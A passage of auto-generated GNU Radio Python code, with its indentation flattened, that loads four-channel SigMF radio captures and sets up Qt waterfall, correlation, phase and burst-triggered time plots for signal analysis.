self.sigmf_source_2 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN2_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self.sigmf_source_1 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN1_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self.sigmf_source_0 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN0_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self._samp_offset_0_3_tool_bar = Qt.QToolBar(self)
if None:
self._samp_offset_0_3_formatter = None
else:
self._samp_offset_0_3_formatter = lambda x: eng_notation.num_to_str(x)
self._samp_offset_0_3_tool_bar.addWidget(Qt.QLabel("samp_offset_0_3"+": "))
self._samp_offset_0_3_label = Qt.QLabel(str(self._samp_offset_0_3_formatter(self.samp_offset_0_3)))
self._samp_offset_0_3_tool_bar.addWidget(self._samp_offset_0_3_label)
self.main_tab_grid_layout_4.addWidget(self._samp_offset_0_3_tool_bar, 7, 0, 1, 1)
for r in range(7, 8):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self._samp_offset_0_2_tool_bar = Qt.QToolBar(self)
if None:
self._samp_offset_0_2_formatter = None
else:
self._samp_offset_0_2_formatter = lambda x: eng_notation.num_to_str(x)
self._samp_offset_0_2_tool_bar.addWidget(Qt.QLabel("samp_offset_0_2"+": "))
self._samp_offset_0_2_label = Qt.QLabel(str(self._samp_offset_0_2_formatter(self.samp_offset_0_2)))
self._samp_offset_0_2_tool_bar.addWidget(self._samp_offset_0_2_label)
self.main_tab_grid_layout_4.addWidget(self._samp_offset_0_2_tool_bar, 6, 0, 1, 1)
for r in range(6, 7):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self._samp_offset_0_1_tool_bar = Qt.QToolBar(self)
if None:
self._samp_offset_0_1_formatter = None
else:
self._samp_offset_0_1_formatter = lambda x: eng_notation.num_to_str(x)
self._samp_offset_0_1_tool_bar.addWidget(Qt.QLabel("samp_offset_0_1"+": "))
self._samp_offset_0_1_label = Qt.QLabel(str(self._samp_offset_0_1_formatter(self.samp_offset_0_1)))
self._samp_offset_0_1_tool_bar.addWidget(self._samp_offset_0_1_label)
self.main_tab_grid_layout_4.addWidget(self._samp_offset_0_1_tool_bar, 5, 0, 1, 1)
for r in range(5, 6):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self.qtgui_waterfall_sink_x_0_0_1 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0_0_1.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0_0_1.enable_grid(False)
self.qtgui_waterfall_sink_x_0_0_1.enable_axis_labels(True)
if not True:
self.qtgui_waterfall_sink_x_0_0_1.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_waterfall_sink_x_0_0_1.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0_0_1.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0_0_1.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0_0_1.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0_0_1.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_0_1_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_0_1_win, 2, 3, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_waterfall_sink_x_0_0_0 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0_0_0.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0_0_0.enable_grid(False)
self.qtgui_waterfall_sink_x_0_0_0.enable_axis_labels(True)
if not True:
self.qtgui_waterfall_sink_x_0_0_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_waterfall_sink_x_0_0_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0_0_0.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0_0_0.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0_0_0.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0_0_0.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_0_0_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_0_0_win, 2, 2, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_waterfall_sink_x_0_0 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0_0.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0_0.enable_grid(False)
self.qtgui_waterfall_sink_x_0_0.enable_axis_labels(True)
if not True:
self.qtgui_waterfall_sink_x_0_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_waterfall_sink_x_0_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0_0.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0_0.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0_0.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0_0.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_0_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_0_win, 2, 1, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_waterfall_sink_x_0 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0.enable_grid(False)
self.qtgui_waterfall_sink_x_0.enable_axis_labels(True)
if not True:
self.qtgui_waterfall_sink_x_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_waterfall_sink_x_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_win, 2, 0, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_vector_sink_f_0 = qtgui.vector_sink_f(
nfft,
0,
1.0,
"x-Axis",
"y-Axis",
"Correlation",
3 # Number of inputs
)
self.qtgui_vector_sink_f_0.set_update_time(0.10)
self.qtgui_vector_sink_f_0.set_y_axis(-140, 10)
self.qtgui_vector_sink_f_0.enable_autoscale(True)
self.qtgui_vector_sink_f_0.enable_grid(True)
self.qtgui_vector_sink_f_0.set_x_axis_units("")
self.qtgui_vector_sink_f_0.set_y_axis_units("")
self.qtgui_vector_sink_f_0.set_ref_level(0)
labels = ['0 to 1', '0 to 2', '0 to 3', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(3):
if len(labels[i]) == 0:
self.qtgui_vector_sink_f_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_vector_sink_f_0.set_line_label(i, labels[i])
self.qtgui_vector_sink_f_0.set_line_width(i, widths[i])
self.qtgui_vector_sink_f_0.set_line_color(i, colors[i])
self.qtgui_vector_sink_f_0.set_line_alpha(i, alphas[i])
self._qtgui_vector_sink_f_0_win = sip.wrapinstance(self.qtgui_vector_sink_f_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_2.addWidget(self._qtgui_vector_sink_f_0_win, 0, 0, 4, 3)
for r in range(0, 4):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.qtgui_time_sink_x_2 = qtgui.time_sink_f(
512, #size
samp_rate, #samp_rate
"Phase Delta", #name
4 #number of inputs
)
self.qtgui_time_sink_x_2.set_update_time(0.10)
self.qtgui_time_sink_x_2.set_y_axis(-1, 1)
self.qtgui_time_sink_x_2.set_y_label('Phase', "deg")
self.qtgui_time_sink_x_2.enable_tags(-1, True)
self.qtgui_time_sink_x_2.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, thresh_phase, 0.00005, 3, "")
self.qtgui_time_sink_x_2.enable_autoscale(True)
self.qtgui_time_sink_x_2.enable_grid(False)
self.qtgui_time_sink_x_2.enable_axis_labels(True)
self.qtgui_time_sink_x_2.enable_control_panel(False)
self.qtgui_time_sink_x_2.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_2.disable_legend()
labels = ['0 to 1', '0 to 2', '0 to 3', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(4):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_2.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_2.set_line_label(i, labels[i])
self.qtgui_time_sink_x_2.set_line_width(i, widths[i])
self.qtgui_time_sink_x_2.set_line_color(i, colors[i])
self.qtgui_time_sink_x_2.set_line_style(i, styles[i])
self.qtgui_time_sink_x_2.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_2.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_2_win = sip.wrapinstance(self.qtgui_time_sink_x_2.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_5.addWidget(self._qtgui_time_sink_x_2_win, 2, 0, 2, 4)
for r in range(2, 4):
self.main_tab_grid_layout_5.setRowStretch(r, 1)
for c in range(0, 4):
self.main_tab_grid_layout_5.setColumnStretch(c, 1)
self.qtgui_time_sink_x_1 = qtgui.time_sink_f(
128, #size
samp_rate / nfft, #samp_rate
"Correlation Magnitude", #name
3 #number of inputs
)
self.qtgui_time_sink_x_1.set_update_time(0.10)
self.qtgui_time_sink_x_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_1.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_1.enable_tags(-1, True)
self.qtgui_time_sink_x_1.set_trigger_mode(qtgui.TRIG_MODE_FREE, qtgui.TRIG_SLOPE_POS, 0.0, 0, 0, "")
self.qtgui_time_sink_x_1.enable_autoscale(True)
self.qtgui_time_sink_x_1.enable_grid(True)
self.qtgui_time_sink_x_1.enable_axis_labels(True)
self.qtgui_time_sink_x_1.enable_control_panel(False)
self.qtgui_time_sink_x_1.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_1.disable_legend()
labels = ['0 to 1', '0 to 2', '0 to 3', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(3):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_1_win = sip.wrapinstance(self.qtgui_time_sink_x_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_2.addWidget(self._qtgui_time_sink_x_1_win, 4, 0, 4, 3)
for r in range(4, 8):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_1_1 = qtgui.time_sink_f(
512, #size
samp_rate, #samp_rate
"Absolute Phase", #name
5 #number of inputs
)
self.qtgui_time_sink_x_0_1_1_1.set_update_time(0.010)
self.qtgui_time_sink_x_0_1_1_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_1_1_1.set_y_label('Phase', "deg")
self.qtgui_time_sink_x_0_1_1_1.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_1_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, thresh_phase, 0.00005, 4, "")
self.qtgui_time_sink_x_0_1_1_1.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_1_1.enable_grid(False)
self.qtgui_time_sink_x_0_1_1_1.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_1_1.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_1_1.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_1_1_1.disable_legend()
labels = ['Chan0', 'Chan1', 'Chan2', 'Chan3', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, 0, 0, 0, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(5):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_1_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_1_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_1_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_1_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_1_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_1_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_1_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_1_1_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_1_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_5.addWidget(self._qtgui_time_sink_x_0_1_1_1_win, 0, 0, 2, 4)
for r in range(0, 2):
self.main_tab_grid_layout_5.setRowStretch(r, 1)
for c in range(0, 4):
self.main_tab_grid_layout_5.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_1_0 = qtgui.time_sink_c(
512, #size
samp_rate, #samp_rate
"", #name
5 #number of inputs
)
self.qtgui_time_sink_x_0_1_1_0.set_update_time(0.010)
self.qtgui_time_sink_x_0_1_1_0.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_1_1_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_1_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_1_0.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, thresh_comp, 0.0001, trig_channel, "")
self.qtgui_time_sink_x_0_1_1_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_1_0.enable_grid(False)
self.qtgui_time_sink_x_0_1_1_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_1_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_1_0.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_1_1_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "blue", "red", "red", "green",
"green", "black", "black", "cyan", "cyan"]
styles = [1, 2, 1, 2, 1,
2, 1, 2, 1, 2]
markers = [0, -1, 0, -1, 0,
-1, 0, -1, 0, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(10):
if len(labels[i]) == 0:
if(i % 2 == 0):
self.qtgui_time_sink_x_0_1_1_0.set_line_label(i, "Re{{Data {0}}}".format(i/2))
else:
self.qtgui_time_sink_x_0_1_1_0.set_line_label(i, "Im{{Data {0}}}".format(i/2))
else:
self.qtgui_time_sink_x_0_1_1_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_1_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_1_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_1_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_1_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_1_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_1_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_1_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_4.addWidget(self._qtgui_time_sink_x_0_1_1_0_win, 2, 0, 2, 4)
for r in range(2, 4):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(0, 4):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_1 = qtgui.time_sink_f(
512, #size
samp_rate, #samp_rate
"", #name
5 #number of inputs
)
self.qtgui_time_sink_x_0_1_1.set_update_time(0.010)
self.qtgui_time_sink_x_0_1_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_1_1.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_1.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, thresh, 0.0001, trig_channel, "")
self.qtgui_time_sink_x_0_1_1.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_1.enable_grid(False)
self.qtgui_time_sink_x_0_1_1.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_1.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_1.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_1_1.disable_legend()
labels = ['Chan0', 'Chan1', 'Chan2', 'Chan3', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, 0, 0, 0, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(5):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_1_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_4.addWidget(self._qtgui_time_sink_x_0_1_1_win, 0, 0, 2, 4)
for r in range(0, 2):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(0, 4):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"Combined", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0_0_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_4.addWidget(self._qtgui_time_sink_x_0_1_0_0_0_0_0_win, 0, 4, 4, 2)
for r in range(0, 4):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(4, 6):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN3", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_0_0_0_win, 0, 3, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN2", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
